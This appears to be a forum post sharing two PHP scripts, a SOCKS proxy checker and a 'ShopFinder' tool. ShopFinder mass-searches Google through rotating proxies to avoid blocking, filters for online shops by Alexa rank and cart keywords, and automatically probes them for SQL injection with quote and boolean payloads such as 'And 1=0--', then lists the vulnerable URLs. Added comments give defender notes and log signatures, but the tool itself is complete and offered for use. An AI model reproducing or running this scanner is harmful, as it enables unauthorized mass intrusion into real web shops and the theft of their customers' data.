tool search shop by hoangduye
code check sock trước
tool check shop
anh em chú ý edit các chỗ màu đỏ nhé
Code:
<title>check sock</title>
<form action="" method="POST">
<textarea name="sock" cols="50" rows="20"></textarea>
<input type="submit" value="check" name="submit1" />
</form><br>
<?php
// Lift PHP's execution time limit for this request; the "@" operator hides any
// warning raised if the call is not permitted.
@set_time_limit(0);
/**
 * Pull the first "a.b.c.d:port"-shaped token out of a line of text.
 *
 * The match is purely lexical: each octet is zero to three digits and the port
 * zero to five digits. Nothing checks that an octet is <= 255 or that the port
 * is <= 65535, so the result is "looks like an endpoint", not "is a valid one".
 *
 * @param string $info One line of pasted text.
 * @return string|null The matched text; when nothing matches, index 0 is unset
 *                     and PHP yields null with a warning.
 */
function get_sock($info)
{
    $pattern = "/[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?\.[0-9]?[0-9]?[0-9]?:[0-9]?[0-9]?[0-9]?[0-9]?[0-9]?/";
    $hit = array();
    preg_match($pattern, $info, $hit);
    return $hit[0];
}
/**
 * Fetch $url through a SOCKS5 proxy and return the response body.
 *
 * @param string $url   Address to request.
 * @param string $proxy Value handed to CURLOPT_PROXY; the caller in this listing
 *                      passes the text returned by get_sock().
 * @return string|bool  Whatever curl_exec() returns with CURLOPT_RETURNTRANSFER
 *                      set: the body on success, false on failure.
 */
function get_page($url,$proxy)
{
$ch=curl_init();
// Return the body from curl_exec() instead of printing it.
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
// Route the request through the supplied endpoint, treated as SOCKS5.
curl_setopt($ch,CURLOPT_PROXY,$proxy);
curl_setopt($ch,CURLOPT_PROXYTYPE,CURLPROXY_SOCKS5);
curl_setopt($ch,CURLOPT_HTTPPROXYTUNNEL,1);
// NOTE(review): these are double-quoted PHP strings, so backslash escapes are
// processed. "\xa" is read as a hex escape (byte 0x0A), which means the path
// cURL receives is not the literal Windows path written here.
curl_setopt($ch,CURLOPT_COOKIEFILE,"C:\xampp\htdocs\check\cookie.txt");
curl_setopt($ch,CURLOPT_COOKIEJAR,"C:\xampp\htdocs\check\cookie.txt");
curl_setopt($ch,CURLOPT_URL,$url);
// Give up on a proxy after 5 seconds.
curl_setopt($ch,CURLOPT_TIMEOUT,5);
$page=curl_exec($ch);
curl_close($ch);
return $page;
}
// Form handler: test every pasted proxy line and print the ones that returned a page.
// NOTE(review): no authentication or request-origin check is visible in this
// listing, so any client that can reach the page can make the hosting server
// open outbound connections through endpoints of the client's choosing. A copy
// of this file found under a web root should be treated as an abuse indicator.
if(isset($_POST["sock"]))
{
$sock=explode("\n",$_POST["sock"]);
$i=0;
// Proxies that passed the test below.
$arrSock = array();
// Loose comparison: the loop ends at the first empty entry or once $i runs past the array.
while($sock[$i]!="")
{
// Keep only the endpoint-shaped part of the line.
$sock[$i]=get_sock(trim($sock[$i]));
// One search request is sent through the proxy as the liveness test.
$page=get_page("http://www.google.com.vn/search?q=allinurl:admin.asp?id=",$sock[$i]);
// Accepted when a body came back and "302 Moved" was not found in it
// (strpos(...)==false is also true when the text sits at offset 0).
if($page!="" && strpos($page,"302 Moved")==false)
{
echo "<font color='green'>".$sock[$i]."</font><br>";ob_flush();flush();
array_push($arrSock,$sock[$i]);
}
else
{
echo "<font color='red'>".$sock[$i]."</font><br>";ob_flush();flush();
}
$i++;
}
echo "====List sock ok====<br>";
// Accepted proxies, one per line, for copy and paste.
$x = join("\r\n",$arrSock);
echo "<textarea rows='10' cols = '20'>".$x."</textarea>";
}
?>
Code:
<title>ShopFinder v1.0</title>
<form action="" method="POST">
<table>
<tr><td>List keywords</td><td>List socks</td></tr>
<tr><td><textarea name="keyword" cols=40 rows=15>google nha'</textarea></td><td><textarea name="sock" cols=40 rows=15>sock nha'</textarea></td></tr>
<tr><td></td><td><input type="submit" value="start" /></td></tr>
</table>
</form>
<?php
######################
# helper functions   #
######################
/**
 * Fetch $url with cURL, optionally through a SOCKS5 proxy, and return the body.
 *
 * NOTE(defender): every request made through this helper carries the same
 * fixed User-Agent literal set below, wildcard characters included. It is sent
 * verbatim, so it is an exact-match string for web access logs and WAF rules.
 *
 * @param string $url   Address to request.
 * @param string $proxy Proxy endpoint; a falsy value (callers pass "") means the
 *                      request leaves directly from the host running the script.
 * @return string|bool  Result of curl_exec() with CURLOPT_RETURNTRANSFER set.
 */
function getPage($url,$proxy)
{
$ch=curl_init();
// Return the body from curl_exec() instead of printing it.
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
//sock5
// Proxy options are applied only when a proxy value was supplied.
if($proxy)
{
curl_setopt($ch,CURLOPT_PROXY,$proxy);
curl_setopt($ch,CURLOPT_PROXYTYPE,CURLPROXY_SOCKS5);
curl_setopt($ch,CURLOPT_HTTPPROXYTUNNEL,1);
}
//user-agent
$agent = "Mozilla/5.0 (Windows; ?; Windows NT 5.1; *rv:*) Gecko/* Firefox/0.9*";
curl_setopt($ch,CURLOPT_USERAGENT,$agent);
curl_setopt($ch,CURLOPT_URL,$url);
// 10-second ceiling per request.
curl_setopt($ch,CURLOPT_TIMEOUT,10);
$page=curl_exec($ch);
curl_close($ch);
return $page;
}
/**
 * Reduce a URL to a bare host-like string by plain text substitution.
 *
 * No URL parsing is involved: every "http://" and every "www." is deleted
 * wherever it occurs, then the text from the first "/" onward is removed.
 * Other schemes are not recognised, so an "https://" URL collapses to "https:".
 *
 * @param string $url URL or host text.
 * @return string What is left after the substitutions.
 */
function getDomain($url)
{
    // The array form of str_replace() applies its searches in order, left to right.
    $host = str_replace(array("http://", "www."), "", $url);
    // Text from the first "/" to the end; false when there is no slash.
    $tail = strstr($host, "/");
    return str_replace($tail, "", $host);
}
/**
 * Report whether none of the given substrings is found in $str.
 *
 * The test uses the truthiness of strpos(), so a substring located at offset 0
 * yields 0 and is treated the same as "not found".
 *
 * @param array  $arrFilterKeyword Substrings to look for.
 * @param string $str              Text to search.
 * @return bool false as soon as one substring is found at an offset above 0, true otherwise.
 */
function notInStr($arrFilterKeyword,$str)
{
    $clean = true;
    foreach ($arrFilterKeyword as $needle) {
        $offset = strpos($str, $needle);
        if ($offset) {
            $clean = false;
            break;
        }
    }
    return $clean;
}
/**
 * Normalise a fetched page so that two responses can be compared as text.
 *
 * Steps, in order: HTML-encode the page, replace every "=" with the marker
 * "vndarkcode", then delete all whitespace, every "http" and every double quote.
 *
 * @param string $page Raw response body.
 * @return string Normalised text.
 */
function cleanUpPage($page)
{
    $text = str_replace("=", "vndarkcode", htmlentities($page));
    // Applied one after another, in the same order as the original pattern array.
    foreach (array("/[\s]/", "/http/", "/\"/") as $pattern) {
        $text = preg_replace($pattern, "", $text);
    }
    return $text;
}
/**
 * Decide whether a collected link is kept for further checking.
 *
 * Two conditions must hold: the rank scraped from an Alexa search page for the
 * link's domain is numeric and not above $rankAlexa, and the link's own page
 * contains at least one of the $arrSearch keywords (as judged by notInStr()).
 * Both requests are made with an empty proxy argument, i.e. directly.
 *
 * @param string $link      URL to evaluate.
 * @param int    $rankAlexa Highest rank value accepted.
 * @param array  $arrSearch Keywords looked for in the page.
 * @return int 1 when the link passes both conditions, 0 otherwise.
 */
function filter($link,$rankAlexa,$arrSearch)
{
$page=getPage("http://www.alexa.com/search?q=".getDomain($link)."&r=home_home&p=bigtop","");
// Join the response into one line so the patterns below can span line breaks.
$page=str_replace("\n","",$page);
// First isolate the "Alexa Traffic Rank:" anchor, then the text inside it.
preg_match("/Alexa[\s]Traffic[\s]Rank:(.*?)\/a\>/",$page,$tmp);
preg_match("/\"\>(.*)\</",$tmp[1],$result);
//echo (intval(str_replace(",","",$result[1])));ob_flush();flush();
// Reject when the rank (thousands separators removed) exceeds the limit or holds no digit at all.
if(intval(str_replace(",","",$result[1])) > $rankAlexa || !preg_match("/\d/",str_replace(",","",$result[1])))
return 0;
// The page is HTML-encoded before the keyword search.
$page = htmlentities(getPage($link,""));
//echo $page;ob_flush();flush();
// notInStr() returning true means no keyword was found, so the link is dropped.
if(notInStr($arrSearch,$page))
return 0;
return 1;
}
#######################
# worker functions    #
#######################
/**
 * Collect candidate links for one search keyword by requesting Google result
 * pages on a fixed list of country domains through the current SOCKS proxy.
 *
 * @param string $keyword          Query text; the caller in this file URL-encodes it first.
 * @param array  $arrFilterKeyword Substrings that disqualify a link (checked with notInStr()).
 * @param array  $arrDomainChecked Domains already collected; links on them are skipped.
 * @param array  $arrSock          Proxy list; entries are popped off the end as needed.
 * @return array Links ("http://" plus the matched text) that passed the filters.
 */
function getLinksFromGoogle($keyword,$arrFilterKeyword,$arrDomainChecked,$arrSock)
{
// Proxy currently in use, taken from the end of the list.
$sockUsing = array_pop($arrSock);
// Upper bound for the "start" result offset.
$limit = 200000;
$arrGoogle = array(
"google.com",
"google.ca",
"google.com.au",
"google.co.uk",
"google.fr",
"google.ch",
"google.com.vn",
"google.nl",
"google.es",
"google.ie",
"google.de",
"google.co.jp"
);
$arrLink = array();
foreach($arrGoogle as $google)
{
// Result offset, advanced by 100 per page.
$h = 0;
while($h < $limit +1)
{
$urlGoogle = "http://www.".$google."/search?&q=".$keyword."&start=".$h."&num=100&filter=1&tbs=cpk:1";
//echo $urlGoogle."<br>";ob_flush();flush();
$pageGoogle = getPage($urlGoogle,$sockUsing);
// Empty response: take the next proxy and step the offset back by 100.
if($pageGoogle == "")
{
if($sockUsing = array_pop($arrSock))
{
$h = $h - 100;
}
else
{
// No proxy left: the whole script terminates with this message.
exit("nap. them^ sock di");
}
}
// Loose ==true: holds for any non-zero offset returned by strpos().
if(strpos($pageGoogle,"did not match any documents")==true)
{
break;
}
// Either marker makes the code switch proxy; presumably they identify the
// search engine's automated-traffic response - confirm against a sample page.
if(strpos($pageGoogle,"http://www.".$google."/support/websearch/bin/answer.py?answer=86640")==true || strpos($pageGoogle,"302 Moved")==true)
{
if($sockUsing = array_pop($arrSock))
{
$h = $h - 100;
}
else
{
exit("nap. them^ sock di");
}
}
// Every href that starts with http://; group 1 is the URL without the scheme.
preg_match_all("/href=[\"]http:\/\/(.*?)\"/",$pageGoogle,$line);
$i=0;
while($line[1][$i]!="")
{
// Kept when: no filter substring is found, the domain has not been seen yet,
// and the URL has a query string or a purely numeric path segment.
if(notInStr($arrFilterKeyword,$line[1][$i]) && !in_array(getDomain($line[1][$i]),$arrDomainChecked) && (preg_match("/\?/",$line[1][$i]) || preg_match("/\/(\d+)\//",$line[1][$i])))
{
array_push($arrLink,"http://".$line[1][$i]);
array_push($arrDomainChecked,getDomain($line[1][$i]));
}
$i++;
}
// Leave this domain when the page carries no "start=" text for the next offset.
if((!strpos($pageGoogle,"start=".($h+100))))
{
break;
}
$h += 100;
}
}
// Put the proxy in use back on the (local) list.
array_push($arrSock,$sockUsing);
return $arrLink;
}
// Probe one URL for signs of SQL injection.
//
// Returns the first probe URL whose response looks affected, or 0 when none does.
//
// NOTE(defender): what this routine leaves behind, as visible in the code below:
//  - every request is made with an empty proxy argument, so the probes arrive
//    from the address of the host running the script;
//  - the probe URLs carry a single quote at the end of the URL, before each "&",
//    or after a numeric path segment, followed by requests in which that quote is
//    replaced by the fixed "And 1=0" / "And 1=1" / "And 2=2" strings listed in
//    $arrCheck - those literals are usable as log and WAF match strings;
//  - the first test only looks for the text "sql" in the response body, so pages
//    that do not echo database errors give it nothing to match on;
//  - the second test compares responses to a false and two true conditions, which
//    only differ when input reaches a query unparameterised. Parameterised
//    queries remove the behaviour both tests depend on.
function check_sql_injection($url)
{
if(preg_match("/\?/",$url))
{
// Record the offset of every "&" in the URL.
$pos[0]=strpos($url,"&");$i=1;
while($pos[$i]=strpos($url,"&",$pos[$i-1]+1))
{
$i=$i+1;
}
// Variant 0: quote appended to the whole URL.
$array_url[0]=stripslashes($url."'");$i=1;
// "!" binds tighter than "==", so this loops while the recorded offset is truthy.
while(!$pos[$i-1]=="")
{
// Rebuild the URL with a quote placed just before the "&" at this offset.
$temp2=substr($url,$pos[$i-1]);
$temp1=substr_replace($url,"'",$pos[$i-1]);
$array_url[$i]=stripslashes($temp1.$temp2);
$i=$i+1;
}
}
elseif(preg_match("/\/(\d+)\//",$url))
{
// No query string: use numeric path segments instead.
$array_url[0]=stripslashes($url."'");
preg_match_all("/\/(\d+)\//",$url,$result);
// str_replace() rewrites every occurrence of the number's text in the URL.
foreach($result[1] as $var)
array_push($array_url,stripslashes(str_replace($var,$var."'",$url)));
}
$i=0;
// Same precedence as above: runs while the entry is truthy.
while(!$array_url[$i]=="")
{
//echo $array_url[$i]."<br>";ob_flush();flush();
$page = strtolower(cleanUpPage(getPage($array_url[$i],"")));
// Test 1: the normalised, lower-cased body contains "sql" (at an offset above 0).
if(strpos($page,"sql"))
{
return $array_url[$i];
}
else
{
// Test 2 runs only when the quoted request's page differs from the page of
// the same URL with every quote removed.
if($page != strtolower(cleanUpPage(getPage(str_replace("'","",$array_url[$i]),""))))
{
//echo 1;ob_flush();flush();
// Four triples (false, true, true) in different quoting and comment styles.
$arrCheck = array(
array("%20And%201=0--","%20And%201=1--","%20And%202=2--"),
array("%20'%20And%201=0+--+","%20'%20And%201=1+--+","%20'%20And%202=2+--+"),
array("%20/*!%20And%201=0*/--","%20/*!%20And%201=1*/--","%20/*!%20And%202=2*/--"),
array("%20'/*!%20And%201=0*/+--+","%20'/*!%20And%201=1*/+--+","%20'/*!%20And%202=2*/+--+"));
foreach($arrCheck as $check)
{
// Each response is normalised and split on the marker that cleanUpPage()
// substitutes for "=".
$a = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[0],$array_url[$i]),"")));
$b = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[1],$array_url[$i]),"")));
$c = explode("vndarkcode",cleanUpPage(getPage(str_replace("'",$check[2],$array_url[$i]),"")));
// Count fragments where the false-condition page differs from the first
// true-condition page while the two true-condition pages agree.
$d = 0;
for($k=0;$k<=count($a);$k++)
{
if(($a[$k] != $b[$k]) && ($b[$k] == $c[$k]))
$d++;
}
// More than 10 such fragments is taken as a positive result.
if($d > 10)
{
return $array_url[$i];
}
}
}
}
$i=$i+1;
}
return 0;
}
/**
 * Second-pass check for one site: list its pages of a given file type through
 * a "site:" search on google.com and hand each parameterised result to
 * check_sql_injection().
 *
 * Search requests go through the current SOCKS proxy; the probing itself is
 * done by check_sql_injection(), which calls getPage() without a proxy.
 *
 * @param string $url      Any URL on the site; only its getDomain() value is used.
 * @param string $fileType Extension placed in the "filetype:" search term.
 * @param array  $arrSock  Proxy list; entries are popped off the end as needed.
 * @return string|int The probe URL reported by check_sql_injection(), or 0.
 */
function scanDetail($url,$fileType,$arrSock)
{
$sockUsing = array_pop($arrSock);
$keyword="site:".getDomain($url)."+filetype:".$fileType;
// Script names already handed to check_sql_injection().
$blackList = array();
// Round counter; the loop allows values 1 to 10.
$end=1;
while($end<=10)
{
$urlGoogle="http://www.google.com/search?q=".$keyword."&start=0&num=100";
$pageGoogle=getPage($urlGoogle,$sockUsing);
// Empty response: take the next proxy and step the round counter back by one.
if($pageGoogle == "")
{
if($pageGoogle == "")
{
if($sockUsing = array_pop($arrSock))
{
$end = $end - 1;
}
else
{
// No proxy left: the whole script terminates with this message.
exit("nap. them^ sock di");
}
}
}
if(strpos($pageGoogle,"did not match any documents")==true)
{
break ;
}
// Either marker makes the code switch proxy, as in getLinksFromGoogle().
if(strpos($pageGoogle,"http://www.google.com/support/websearch/bin/answer.py?answer=86640")==true || strpos($pageGoogle,"302 Moved")==true)
{
if($sockUsing = array_pop($arrSock))
{
$end = $end - 1;
}
else
{
exit("nap. them^ sock di");
}
}
// Every href that starts with http://; group 1 is the URL without the scheme.
preg_match_all("/href=\"http:\/\/(.*?)\"/",$pageGoogle,$line);
$i=0;
while($line[1][$i]!="")
{
// Skip search-engine, video, cache and ranking-site links.
if(!preg_match("/google.com|youtube.com|cache|alexa.com|search\?/",$line[1][$i]))
{
if(!preg_match("/\?/",$line[1][$i]))
{
// No query string: extend the search with an exclusion term built from
// the text between the first "/" and the following ".".
preg_match("/\/(.*?)\./",$line[1][$i],$file);
$keyword=$keyword."+-".$file[1].".".$filetype;
}
else
{
preg_match("/\/(.*?)\./",$line[1][$i],$file);
// Each script name is probed once.
if(!in_array($file[1],$blackList))
{
$result = check_sql_injection("http://".$line[1][$i]);
if($result)
{
array_push($arrSock,$sockUsing);
return $result;
}
// Nothing found: exclude the script from later searches and remember it.
$keyword=$keyword."+-".$file[1].".".$fileType;
array_push($blackList,$file[1]);
}
}
}
$i=$i+1;
}
// Stop when the page lacks the "start=" text computed on this line.
if((!strpos($pageGoogle,"start=".($h+100))))
{
break;
}
$end=$end+1;
}
array_push($arrSock,$sockUsing);
return 0;
}
// Form handler: for every posted keyword, collect links, filter them, and
// report the URLs for which check_sql_injection() or scanDetail() returned a hit.
//
// NOTE(defender): nothing in this listing authenticates the caller, and the
// posted keyword is echoed into the page without HTML escaping. The banner text
// "Shop finder v1.0 code by vndarkcode" and the "vndarkcode" marker used by
// cleanUpPage() are fixed literals, which makes them practical search strings
// when looking for copies of this script on a web server.
if(isset($_POST["keyword"]) && isset($_POST["sock"]))
{
set_time_limit(0);
// only check shops whose rank number is below 5 million
$rankAlexa = 5000000;
// keywords that must appear in the page
$arrSearch = array("price","cart","basket","$","add to");
// links containing any of these words are discarded
$arrFilterKeyword = array("google","wikipedia.org","youtube.com","alexa.com","yahoo.com","javascript:void","cache","rapidshare.com","mysql.com","php.net","bing.com","msn.com","microsoft.com","union","torrent","live.com","microsofttranslator.com","amazon.com","facebook.com","info.com","Info.com","order+by","..","'","forum","forum.","hack","security","milw0rm.com","exploit","ebay.com","apple.com","blog",".xml","flickr.com",".pdf",".txt","\"",".vn","india",".in",".cn",".kr",".jp",".hk",".hu",".li",".ru","thailand","thai",".tw","taiwan");
echo "<font color='red'><h3>[+]Shop finder v1.0 code by vndarkcode</h3></font>";ob_flush();flush();
// Both textareas are split on CRLF.
$arrSock = explode("\r\n",$_POST["sock"]);
$arrDomainChecked = array();
$arrKeyword = explode("\r\n",$_POST["keyword"]);
foreach($arrKeyword as $keyword)
{
echo "<font color='green'>[+]Checking keyword : ".$keyword."</font><br>";ob_flush();flush();
echo " <font color='brown'>[*]Geting links from google</font><br>";ob_flush();flush();
// Trim, then URL-encode while keeping spaces and "+" as "+": both are swapped
// for the placeholder "xxx" before urlencode() and turned into "+" afterwards.
$keyword = ltrim($keyword);
$keyword = rtrim($keyword);
$keyword = str_replace(" ","xxx",$keyword);
$keyword = str_replace("+","xxx",$keyword);
$keyword = urlencode($keyword);
$keyword = str_replace("xxx","+",$keyword);
$arrLink = getLinksFromGoogle($keyword,$arrFilterKeyword,$arrDomainChecked,$arrSock);
echo " <font color='brown'>[*]Found ".count($arrLink)." shops</font><br>";ob_flush();flush();
echo " <font color='brown'>[*]Finding bug shops</font><br>";ob_flush();flush();
// Number of links reported for this keyword.
$i = 0;
foreach($arrLink as $link)
{
// Only links that pass the rank and page-keyword filter are probed.
if(filter($link,$rankAlexa,$arrSearch))
{
$result = check_sql_injection($link);
if($result)
{
echo " <a href=\"".$result."\" target='_blank'>".$result."</a> => sql injection<br>";ob_flush();flush();$i++;
}
else
{
// Nothing on the link itself: search the rest of the site for "php" pages.
$result = scanDetail($link,"php",$arrSock);
if($result)
{
echo " <a href=\"".$result."\" target='_blank'>".$result."</a> => sql injection<br>";ob_flush();flush();$i++;
}
}
}
}
echo " <font color='brown'>[*]Found ".$i."/".count($arrLink)." bugs shop</font><br>";ob_flush();flush();
echo " <font color='brown'>[*]Done</font><br>";ob_flush();flush();
}
}
?>
